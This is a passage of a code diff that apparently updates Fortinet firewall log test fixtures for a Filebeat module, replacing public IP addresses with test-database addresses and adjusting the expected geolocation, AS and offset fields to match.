         "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.",
         "observer.name": "firewall",
         "observer.product": "Fortigate",
@@ -1078,7 +1025,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 9795,
+        "log.offset": 9814,
         "message": "Updated tag FCTEMS0000011111_AV-Running.",
         "observer.name": "firewall",
         "observer.product": "Fortigate",
@@ -1108,7 +1055,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 10131,
+        "log.offset": 10150,
         "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.",
         "observer.name": "firewall",
         "observer.product": "Fortigate",
@@ -1138,7 +1085,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 10475,
+        "log.offset": 10494,
         "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.",
         "observer.name": "firewall",
         "observer.product": "Fortigate",
@@ -1168,7 +1115,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 10823,
+        "log.offset": 10842,
         "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.",
         "observer.name": "firewall",
         "observer.product": "Fortigate",
diff --git a/x-pack/filebeat/module/fortinet/firewall/test/traffic.log b/x-pack/filebeat/module/fortinet/firewall/test/traffic.log
index 5da8ddc11e05..4395f0c8d30f 100644
--- a/x-pack/filebeat/module/fortinet/firewall/test/traffic.log
+++ b/x-pack/filebeat/module/fortinet/firewall/test/traffic.log
@@ -1,12 +1,12 @@
-<189>date=2020-04-23 time=01:16:08 devname="testswitch1" devid="somerouterid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="OPERATIONAL" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf="srcintfname" srcintfrole="lan" dstip=8.8.8.8 dstport=161 dstintf="dstintfname" dstintfrole="lan" sessionid=155313 proto=17 action="deny" policyid=0 policytype="policy" service="SNMP" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat="unscanned" crscore=30 craction=131072 crlevel="high"
-<188>date=2020-04-23 time=12:14:09 devname="newfirewall" devid="newrouterid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230049761513222 tz="-0500" srcip=192.168.1.6 srcport=53438 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" sessionid=435234 proto=17 action="dns" policyid=26 policytype="policy" poluuid="2345de-b143-52134d8-6654f-4654sdfg16f431" policyname="elasticnewruleset" service="DNS" dstcountry="Netherlands" srccountry="Reserved" appcat="unscanned" crscore=5 craction=54144 crlevel="low"
-<189>date=2020-04-23 time=12:11:51 devname="newfirewall" devid="newrouterid" logid="0000000020" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587229911390385486 tz="-0500" srcip=192.168.10.10 srcport=6000 srcintf="port1" srcintfrole="lan" dstip=8.6.4.7 dstport=6000 dstintf="wan1" dstintfrole="wan" sessionid=4352 proto=17 action="accept" policyid=3426 policytype="policy" poluuid="1765de8-5a13-765da73fdsfa1c" policyname="newruleelastic" service="portname" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=123.123.123.123 transport=60964 appcat="unknown" applist="policylist" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728
-<189>date=2020-04-23 time=12:11:48 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229908751434997 tz="-0500" srcip=2001:4860:4860::8888 identifier=0 srcintf="port1" srcintfrole="lan" dstip=2001:4860:4860::8888 dstintf="unknown0" dstintfrole="undefined" sessionid=6542345 proto=58 action="accept" policyid=0 policytype="someotherpolicy" service="icmp6/1/0" trandisp="noop" app="icmp6/25/0" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat="unscanned"
-<189>date=2020-04-23 time=13:10:57 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229857509058693 tz="-0400" srcip=9.7.7.7 identifier=61 srcintf="wan1" srcintfrole="wan" dstip=8.8.8.8 dstintf="unknown0" dstintfrole="undefined" sessionid=123 proto=1 action="accept" policyid=0 policytype="rulepolicy" service="PING" dstcountry="Norway" srccountry="Netherlands" trandisp="noop" app="PING" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat="unscanned"
+<189>date=2020-04-23 time=01:16:08 devname="testswitch1" devid="somerouterid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="OPERATIONAL" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf="srcintfname" srcintfrole="lan" dstip=175.16.199.1 dstport=161 dstintf="dstintfname" dstintfrole="lan" sessionid=155313 proto=17 action="deny" policyid=0 policytype="policy" service="SNMP" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat="unscanned" crscore=30 craction=131072 crlevel="high"
+<188>date=2020-04-23 time=12:14:09 devname="newfirewall" devid="newrouterid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230049761513222 tz="-0500" srcip=192.168.1.6 srcport=53438 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=53 dstintf="wan1" dstintfrole="wan" sessionid=435234 proto=17 action="dns" policyid=26 policytype="policy" poluuid="2345de-b143-52134d8-6654f-4654sdfg16f431" policyname="elasticnewruleset" service="DNS" dstcountry="Netherlands" srccountry="Reserved" appcat="unscanned" crscore=5 craction=54144 crlevel="low"
+<189>date=2020-04-23 time=12:11:51 devname="newfirewall" devid="newrouterid" logid="0000000020" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587229911390385486 tz="-0500" srcip=175.16.199.1 srcport=6000 srcintf="port1" srcintfrole="lan" dstip=8.6.4.7 dstport=6000 dstintf="wan1" dstintfrole="wan" sessionid=4352 proto=17 action="accept" policyid=3426 policytype="policy" poluuid="1765de8-5a13-765da73fdsfa1c" policyname="newruleelastic" service="portname" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=67.43.156.12 transport=60964 appcat="unknown" applist="policylist" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728
+<189>date=2020-04-23 time=12:11:48 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229908751434997 tz="-0500" srcip=81.2.69.144 identifier=0 srcintf="port1" srcintfrole="lan" dstip=81.2.69.144 dstintf="unknown0" dstintfrole="undefined" sessionid=6542345 proto=58 action="accept" policyid=0 policytype="someotherpolicy" service="icmp6/1/0" trandisp="noop" app="icmp6/25/0" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat="unscanned"
+<189>date=2020-04-23 time=13:10:57 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229857509058693 tz="-0400" srcip=81.2.69.144 identifier=61 srcintf="wan1" srcintfrole="wan" dstip=175.16.199.1 dstintf="unknown0" dstintfrole="undefined" sessionid=123 proto=1 action="accept" policyid=0 policytype="rulepolicy" service="PING" dstcountry="Norway" srccountry="Netherlands" trandisp="noop" app="PING" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat="unscanned"
 <188>date=2020-04-23 time=12:14:39 devname="firewall3" devid="oldfwid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230079841464445 tz="-0500" srcip=192.168.1.1 srcport=62493 srcintf="port1" srcintfrole="lan" dstip=192.168.100.100 dstport=1235 dstintf="newinterface" dstintfrole="undefined" sessionid=54234 proto=17 action="ip-conn" policyid=49 policytype="policy" poluuid="654cc-b6542-53467u8-e45234-1566casd35f7836" policyname="oldpolicyname" user="elasticsuper" authserver="FSSO_newfsso" service="udp/12302" dstcountry="Reserved" srccountry="Reserved" appcat="unscanned" crscore=5 craction=63332144 crlevel="low"
-<189>date=2020-04-23 time=12:14:28 devname="firewall3" devid="oldfwid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587230069291463928 tz="-0500" srcip=192.168.50.50 srcport=56603 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=442 dstintf="wan1" dstintfrole="wan" sessionid=2345 proto=6 action="close" policyid=2365 policytype="policy" poluuid="654644c-b064-fdgdf3425-f003-1234ghdf682e05f" policyname="someoldpolicyname" user="elasticuser" group="testgroup" authserver="FSSO_something" service="HTTPS" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=23.23.23.23 transport=603 appid=43540 app="Skype.Portals" appcat="Collaboration" apprisk="elevated" applist="someapplist" appact="detected" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality="Seq_num(3), alive, selected" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction="block" countweb=1 countapp=1 crscore=5 craction=6144 crlevel="low"
+<189>date=2020-04-23 time=12:14:28 devname="firewall3" devid="oldfwid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587230069291463928 tz="-0500" srcip=81.2.69.145 srcport=56603 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=442 dstintf="wan1" dstintfrole="wan" sessionid=2345 proto=6 action="close" policyid=2365 policytype="policy" poluuid="654644c-b064-fdgdf3425-f003-1234ghdf682e05f" policyname="someoldpolicyname" user="elasticuser" group="testgroup" authserver="FSSO_something" service="HTTPS" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=23.23.23.23 transport=603 appid=43540 app="Skype.Portals" appcat="Collaboration" apprisk="elevated" applist="someapplist" appact="detected" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality="Seq_num(3), alive, selected" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction="block" countweb=1 countapp=1 crscore=5 craction=6144 crlevel="low"
 <189>date=2019-03-31 time=06:42:54 logid="0002000012" type="traffic" subtype="multicast" level="notice" vd="vdom1" eventtime=1554039772 srcip=172.16.200.55 srcport=60660 srcintf="port25" srcintfrole="undefined" dstip=230.1.1.2 dstport=7878 dstintf="port3" dstintfrole="undefined" sessionid=1162 proto=17 action="accept" policyid=1 policytype="multicast-policy" service="udp/7878" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=22 sentbyte=5940 rcvdbyte=0 sentpkt=11 rcvdpkt=0 appcat="unscanned"
-<189>date=2019-05-10 time=14:18:54 logid="0004000017" type="traffic" subtype="sniffer" level="notice" vd="root" eventtime=1557523134021045897 srcip=208.91.114.4 srcport=50463 srcintf="port1" srcintfrole="undefined" dstip=104.80.88.154 dstport=443 dstintf="port1" dstintfrole="undefined" sessionid=2193276 proto=6 action="accept" policyid=3 policytype="sniffer" service="HTTPS" dstcountry="United States" srccountry="Canada" trandisp="snat" transip=0.0.0.0 transport=0 duration=10 sentbyte=0 rcvdbyte=0 sentpkt=0 rcvdpkt=0 appcat="unscanned" utmaction="allow" countips=1 crscore=5 craction=32768 sentdelta=0 rcvddelta=0 utmref=65162-7772
+<189>date=2019-05-10 time=14:18:54 logid="0004000017" type="traffic" subtype="sniffer" level="notice" vd="root" eventtime=1557523134021045897 srcip=67.43.156.15 srcport=50463 srcintf="port1" srcintfrole="undefined" dstip=104.80.88.154 dstport=443 dstintf="port1" dstintfrole="undefined" sessionid=2193276 proto=6 action="accept" policyid=3 policytype="sniffer" service="HTTPS" dstcountry="United States" srccountry="Canada" trandisp="snat" transip=0.0.0.0 transport=0 duration=10 sentbyte=0 rcvdbyte=0 sentpkt=0 rcvdpkt=0 appcat="unscanned" utmaction="allow" countips=1 crscore=5 craction=32768 sentdelta=0 rcvddelta=0 utmref=65162-7772
 <189>date=2019-05-13 time=11:45:04 logid="0000000013" type="traffic" subtype="forward" level="notice" vd="vdom1" eventtime=1557773104815101919 srcip=10.1.100.11 srcport=60446 srcintf="port12" srcintfrole="undefined" dstip=172.16.200.55 dstport=80 dstintf="port11" dstintfrole="undefined" srcuuid="48420c8a-5c88-51e9-0424-a37f9e74621e" dstuuid="187d6f46-5c86-51e9-70a0-fadcfc349c3e" poluuid="3888b41a-5c88-51e9-cb32-1c32c66b4edf" sessionid=359260 proto=6 action="close" policyid=4 policytype="policy" service="HTTP" dstcountry="Reserved" srccountry="Reserved" trandisp="snat" transip=172.16.200.2 transport=60446 appid=15893 app="HTTP.BROWSER" appcat="Web.Client" apprisk="medium" applist="g-default" duration=1 sentbyte=412 rcvdbyte=2286 sentpkt=6 rcvdpkt=6 wanin=313 wanout=92 lanin=92 lanout=92 utmaction="block" countav=1 countapp=1 crscore=50 craction=2 osname="Ubuntu" mastersrcmac="a2:e9:00:ec:40:01" srcmac="a2:e9:00:ec:40:01" srcserver=0 utmref=65497-770
 <189>date=2019-05-13 time=16:29:50 logid="0000000013" type="traffic" subtype="forward" level="notice" vd="vdom1" eventtime=1557790190452146185 srcip=10.1.100.11 srcport=44258 srcintf="port12" srcintfrole="undefined" dstip=185.244.31.158 dstport=80 dstintf="port11" dstintfrole="undefined" srcuuid="ae28f494-5735-51e9-f247-d1d2ce663f4b" dstuuid="ae28f494-5735-51e9-f247-d1d2ce663f4b" poluuid="ccb269e0-5735-51e9-a218-a397dd08b7eb" sessionid=381780 proto=6 action="close" policyid=1 policytype="policy" service="HTTP" dstcountry="Germany" srccountry="Reserved" trandisp="snat" transip=172.16.200.2 transport=44258 duration=5 sentbyte=736 rcvdbyte=3138 sentpkt=14 rcvdpkt=5 appcat="unscanned" utmaction="block" countweb=1 crscore=30 craction=4194304 osname="Ubuntu" mastersrcmac="a2:e9:00:ec:40:01" srcmac="a2:e9:00:ec:40:01" srcserver=0 utmref=65497-796
 <189>date=2019-05-15 time=17:58:10 logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1557968289 srcip=10.1.100.22 srcport=46810 srcintf="port10" srcintfrole="lan" dstip=172.16.200.55 dstport=80 dstintf="port9" dstintfrole="wan" poluuid="d8ce7a90-7763-51e9-e2be-741294c96f31" sessionid=4017 proto=6 action="close" policyid=1 policytype="policy" service="HTTP" dstcountry="Reserved" srccountry="Reserved" trandisp="snat" transip=172.16.200.10 transport=46810 duration=89 sentbyte=565 rcvdbyte=9112 sentpkt=9 rcvdpkt=8 appcat="unscanned" utmaction="block" countips=1 crscore=50 craction=4096 devtype="Unknown" devcategory="None" mastersrcmac="00:0c:29:51:38:5e" srcmac="00:0c:29:51:38:5e" srcserver=0 utmref=0-302
diff --git a/x-pack/filebeat/module/fortinet/firewall/test/traffic.log-expected.json b/x-pack/filebeat/module/fortinet/firewall/test/traffic.log-expected.json
index a9cae52aa9be..ca1da526e1f5 100644
--- a/x-pack/filebeat/module/fortinet/firewall/test/traffic.log-expected.json
+++ b/x-pack/filebeat/module/fortinet/firewall/test/traffic.log-expected.json
@@ -1,15 +1,16 @@
 [
     {
         "@timestamp": "2020-04-23T01:16:08.000-02:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 161,
         "event.action": "deny",
         "event.category": [
@@ -46,7 +47,7 @@
         "log.level": "notice",
         "log.offset": 0,
         "network.bytes": 0,
-        "network.community_id": "1:5XHCUlirlh1DoTaoFuXEVxc6Obs=",
+        "network.community_id": "1:8bNES6YDdszaPi28xM3VcSwJdbg=",
         "network.iana_number": "17",
         "network.protocol": "snmp",
         "network.transport": "udp",
@@ -60,7 +61,7 @@
         "observer.vendor": "Fortinet",
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "rule.category": "unscanned",
         "rule.id": "0",
@@ -77,14 +78,15 @@
     },
     {
         "@timestamp": "2020-04-23T12:14:09.000-05:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 53,
         "event.action": "dns",
         "event.category": [
@@ -117,8 +119,8 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 571,
-        "network.community_id": "1:3UJ+CJ3YHclw01NEh4cnwf958wY=",
+        "log.offset": 576,
+        "network.community_id": "1:XfJvzLBAUivFLHoCO1CY6XoPK/8=",
         "network.iana_number": "17",
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -131,8 +133,8 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "192.168.1.6",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.1.6"
         ],
         "rule.category": "unscanned",
         "rule.id": "26",
@@ -149,14 +151,7 @@
     },
     {
         "@timestamp": "2020-04-23T12:11:51.000-05:00",
-        "destination.as.number": 40386,
-        "destination.as.organization.name": "Bloomip Inc.",
         "destination.bytes": 65446,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.6.4.7",
         "destination.packets": 1045601,
         "destination.port": 6000,
@@ -194,9 +189,9 @@
         "fortinet.firewall.vwlid": "0",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 1163,
+        "log.offset": 1173,
         "network.bytes": 504096,
-        "network.community_id": "1:1+gwRFW+FnJQJZjzI/5oD2giJeY=",
+        "network.community_id": "1:0Eqo4bxxbVP3bSKsiVJ4ynR2uB8=",
         "network.iana_number": "17",
         "network.packets": 1769018,
         "network.protocol": "portname",
@@ -210,7 +205,7 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "192.168.10.10",
+            "175.16.199.1",
             "8.6.4.7"
         ],
         "rule.category": "unknown",
@@ -219,19 +214,18 @@
         "rule.ruleset": "policy",
         "rule.uuid": "1765de8-5a13-765da73fdsfa1c",
         "service.type": "fortinet",
-        "source.as.number": 4808,
-        "source.as.organization.name": "China Unicom Beijing Province Network",
+        "source.as.number": 35908,
         "source.bytes": 438650,
-        "source.geo.city_name": "Beijing",
+        "source.geo.city_name": "Changchun",
         "source.geo.continent_name": "Asia",
         "source.geo.country_iso_code": "CN",
         "source.geo.country_name": "China",
-        "source.geo.location.lat": 39.9288,
-        "source.geo.location.lon": 116.3889,
-        "source.geo.region_iso_code": "CN-BJ",
-        "source.geo.region_name": "Beijing",
-        "source.ip": "192.168.10.10",
-        "source.nat.ip": "123.123.123.123",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
+        "source.nat.ip": "67.43.156.12",
         "source.nat.port": 60964,
         "source.packets": 723417,
         "source.port": 6000,
@@ -242,15 +236,16 @@
     },
     {
         "@timestamp": "2020-04-23T12:11:48.000-05:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 20,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "2001:4860:4860::8888",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.144",
         "destination.packets": 0,
         "event.action": "accept",
         "event.category": [
@@ -281,15 +276,15 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 1897,
+        "log.offset": 1903,
         "network.application": "icmp6/25/0",
         "network.bytes": 3034,
-        "network.community_id": "1:ajyH1GcZSUXhLMFORcVo2L1sA1Y=",
+        "network.community_id": "1:88ozpFHdjx44KUIm/9vfDoO2jsk=",
         "network.iana_number": "58",
         "network.packets": 4,
         "network.protocol": "icmp6/1/0",
         "network.transport": "ipv6-icmp",
-        "network.type": "ipv6",
+        "network.type": "ipv4",
         "observer.egress.interface.name": "unknown0",
         "observer.ingress.interface.name": "port1",
         "observer.name": "newfirewall",
@@ -298,21 +293,22 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "2001:4860:4860::8888"
+            "81.2.69.144"
         ],
         "rule.category": "unscanned",
         "rule.id": "0",
         "rule.ruleset": "someotherpolicy",
         "service.type": "fortinet",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
         "source.bytes": 3014,
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "2001:4860:4860::8888",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.144",
         "source.packets": 4,
         "tags": [
             "fortinet-firewall",
@@ -321,15 +317,16 @@
     },
     {
         "@timestamp": "2020-04-23T13:10:57.000-04:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 10,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 40,
         "event.action": "accept",
         "event.category": [
@@ -362,10 +359,10 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 2447,
+        "log.offset": 2435,
         "network.application": "PING",
         "network.bytes": 10,
-        "network.community_id": "1:e4Ubz/EgdwpC5IEhMK4GmP2pwJM=",
+        "network.community_id": "1:egBfbLgtrijMKr5zptNNyYdllaE=",
         "network.iana_number": "1",
         "network.packets": 40,
         "network.protocol": "ping",
@@ -379,20 +376,23 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "8.8.8.8",
-            "9.7.7.7"
+            "175.16.199.1",
+            "81.2.69.144"
         ],
         "rule.category": "unscanned",
         "rule.id": "0",
         "rule.ruleset": "rulepolicy",
         "service.type": "fortinet",
         "source.bytes": 0,
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "9.7.7.7",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.144",
         "source.packets": 0,
         "tags": [
             "fortinet-firewall",
@@ -434,7 +434,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 2993,
+        "log.offset": 2990,
         "network.community_id": "1:8S1phidNTgIiEGM89KsStyENoH8=",
         "network.iana_number": "17",
         "network.protocol": "udp/12302",
@@ -470,15 +470,16 @@
     },
     {
         "@timestamp": "2020-04-23T12:14:28.000-05:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 77654,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 70,
         "destination.port": 442,
         "event.action": "close",
@@ -529,10 +530,10 @@
         "fortinet.firewall.wanout": "6671",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 3656,
+        "log.offset": 3653,
         "network.application": "Skype.Portals",
         "network.bytes": 78577,
-        "network.community_id": "1:a9EOn6Ei99BmsI8Wi5+qyGjIUgI=",
+        "network.community_id": "1:hTeZu8dnUyDg40++rBqS1lZF7AQ=",
         "network.iana_number": "6",
         "network.packets": 183,
         "network.protocol": "https",
@@ -546,8 +547,8 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "192.168.50.50",
-            "8.8.8.8"
+            "175.16.199.1",
+            "81.2.69.145"
         ],
         "related.user": [
             "elasticuser"
@@ -558,18 +559,16 @@
         "rule.ruleset": "policy",
         "rule.uuid": "654644c-b064-fdgdf3425-f003-1234ghdf682e05f",
         "service.type": "fortinet",
-        "source.as.number": 14618,
-        "source.as.organization.name": "Amazon.com, Inc.",
         "source.bytes": 923,
-        "source.geo.city_name": "Ashburn",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 39.0481,
-        "source.geo.location.lon": -77.4728,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "192.168.50.50",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.145",
         "source.nat.ip": "23.23.23.23",
         "source.nat.port": 603,
         "source.packets": 113,
@@ -647,14 +646,9 @@
     },
     {
         "@timestamp": "2019-05-10T14:18:54.000-02:00",
-        "destination.as.number": 20940,
-        "destination.as.organization.name": "Akamai International B.V.",
+        "destination.as.number": 35994,
+        "destination.as.organization.name": "Akamai Technologies, Inc.",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.80.88.154",
         "destination.packets": 0,
         "destination.port": 443,
@@ -694,7 +688,7 @@
         "log.level": "notice",
         "log.offset": 5177,
         "network.bytes": 0,
-        "network.community_id": "1:xA35Yo5iuXuJBnFVsWZvOqdphyc=",
+        "network.community_id": "1:FUNVChD2K8kyVo9eGl6FqaTLwPM=",
         "network.iana_number": "6",
         "network.packets": 0,
         "network.protocol": "https",
@@ -707,24 +701,20 @@
         "observer.vendor": "Fortinet",
         "related.ip": [
             "104.80.88.154",
-            "208.91.114.4"
+            "67.43.156.15"
         ],
         "rule.category": "unscanned",
         "rule.id": "3",
         "rule.ruleset": "sniffer",
         "service.type": "fortinet",
-        "source.as.number": 40934,
-        "source.as.organization.name": "Fortinet Inc.",
+        "source.as.number": 35908,
         "source.bytes": 0,
-        "source.geo.city_name": "Surrey",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "CA",
-        "source.geo.country_name": "Canada",
-        "source.geo.location.lat": 49.1963,
-        "source.geo.location.lon": -122.8106,
-        "source.geo.region_iso_code": "CA-BC",
-        "source.geo.region_name": "British Columbia",
-        "source.ip": "208.91.114.4",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
